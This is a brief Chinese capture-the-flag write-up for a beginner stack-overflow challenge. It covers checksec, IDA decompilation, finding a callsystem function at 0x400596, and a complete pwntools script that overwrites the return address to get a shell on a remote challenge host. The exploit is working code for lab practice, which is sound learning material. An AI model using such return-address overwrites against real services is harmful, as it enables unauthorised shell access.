checksec然后试运行

放入64位IDA,F5大法


典型栈溢出
发现callsystem函数

找到callsystem的地址,是0x400596

写脚本
#coding=utf8
from pwn import *
context.log_level = 'debug'
p = remote('111.198.29.45',48379)
payload = ''
payload += 0x80*'A'
payload += p64(0)
payload += p64(0x400596)
p.sendline(payload)
p.interactive()

成功